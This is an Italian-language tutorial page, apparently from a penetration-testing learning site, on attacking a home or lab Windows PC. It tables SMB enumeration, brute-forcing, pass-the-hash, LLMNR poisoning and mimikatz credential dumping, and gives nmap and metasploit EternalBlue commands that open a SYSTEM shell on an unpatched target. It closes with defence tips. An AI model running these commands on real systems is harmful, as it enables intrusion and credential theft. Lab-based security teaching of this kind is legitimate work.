Home › Dispositivi › PC Windows
PC Windows — cosa puoi fare
Il PC di casa/lab: si testano SMB (condivisioni), RDP (desktop remoto), vecchie vulnerabilità e le credenziali.
Solo sul tuo PC o in lab (es. una VM Windows).
Passo 1 — trovalo e guarda le porte
sudo nmap -sV -p- 192.168.1.20
Porte tipiche: 445/139 (SMB), 3389 (RDP), 5985 (WinRM), 135 (RPC).
Cosa puoi fare / testare
| Cosa | Come | Tool |
|---|---|---|
| Vedere le condivisioni SMB | Elenchi share, spesso anonime | smbclient / enum4linux |
| Cercare vulnerabilità SMB | Script che testano MS17-010 ecc. | nmap |
| EternalBlue (Windows vecchi) | MS17-010 → shell SYSTEM | metasploit |
| Brute di SMB/RDP | Provi credenziali su tutta la rete | crackmapexec / hydra |
| Shell con credenziali/hash | Esegui comandi da remoto | impacket / evil-winrm |
| Rubare hash in rete | Avveleni LLMNR e catturi NTLM | responder |
| Dump credenziali (dopo accesso) | Password/hash dalla memoria | mimikatz |
Prova a casa (VM Windows vulnerabile)
sudo nmap -p445 --script smb-vuln* 192.168.1.20
msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.20 ; set LHOST tun0 ; exploit
Tutorial: Exploitare i servizi · Privesc Windows.
Difesa
- Aggiornamenti sempre attivi (EternalBlue è del 2017, ma i PC non patchati esistono ancora).
- Password forti + niente SMB/RDP esposti a Internet.
- Disattiva SMBv1; usa firewall; account senza admin per l'uso quotidiano.
Catalogo: Arsenale · Sistema / AD.